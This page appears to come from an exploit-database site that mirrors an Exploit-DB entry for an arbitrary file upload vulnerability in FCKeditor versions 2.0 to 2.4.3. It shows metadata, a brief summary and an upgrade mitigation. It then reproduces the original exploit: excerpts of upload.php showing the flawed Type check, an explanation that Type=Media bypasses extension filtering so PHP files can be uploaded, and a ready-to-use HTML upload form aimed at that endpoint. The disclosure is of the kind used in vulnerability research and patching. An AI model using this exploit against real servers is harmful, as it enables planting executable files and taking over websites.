header-logo
Suggest Exploit
vendor:
FCKeditor
by:
grabz
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: FCKeditor
Affected Version From: 2.0
Affected Version To: 2.4.3
Patch Exists: YES
Related CWE: N/A
CPE: a:fckeditor:fckeditor
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: 2.0, 2.2, 2.3.2, 2.4.0, 2.4.3
2009

FCKeditor 2.0-2.4.3 arbitrary file upload

FCKeditor is a popular open source WYSIWYG HTML editor used by many websites. A vulnerability exists in versions 2.0-2.4.3 which allows an attacker to upload arbitrary files to the server. For versions 2.0-2.2, an attacker can send any text that is not contained in (File, Flash, Image) as the Type parameter and then upload a file with any extension. For versions 2.3.0-2.4.3, an attacker can send Type=Media and upload any file as the Media parameter is not defined in the config.php file.

Mitigation:

Upgrade to the latest version of FCKeditor.
Source

Exploit-DB raw data:

# Exploit Title: FCKeditor 2.0-2.4.3 arbitrary file upload
# Author: grabz
# Software Link: http://sourceforge.net/projects/fckeditor/
# Version: FCKeditor 2.x <= 2.4.3
# Tested on: 2.0, 2.2, 2.3.2, 2.4.0, 2.4.3

for version 2.0 - 2.2:
in file FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#
#// Get the allowed and denied extensions arrays.
#$arAllowed    = $Config['AllowedExtensions'][$sType] ;
#$arDenied    = $Config['DeniedExtensions'][$sType] ;
we can send as Type any text that not contained in (File, Flash, Image) and
then we can upload file with any extension like ".php"

for version 2.3.0 - 2.4.3:
in file FCKeditor/editor/filemanager/upload/php/upload.php
#$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
#
#// Check if it is an allowed type.
#if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
#    SendResults( 1, '', '', 'Invalid type specified' ) ;
#
#// Get the allowed and denied extensions arrays.
#$arAllowed    = $Config['AllowedExtensions'][$sType] ;
#$arDenied    = $Config['DeniedExtensions'][$sType] ;
in this code we can see filter by Type, but in config.php
$Config['AllowedExtensions']['Media'] and
$Config['DeniedExtensions']['Media'] not exists))
if we send Type=Media, we can upload any file)

#Exploit
<form enctype="multipart/form-data" action="
http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>

Navigation

Suggest Exploit

Services By CQR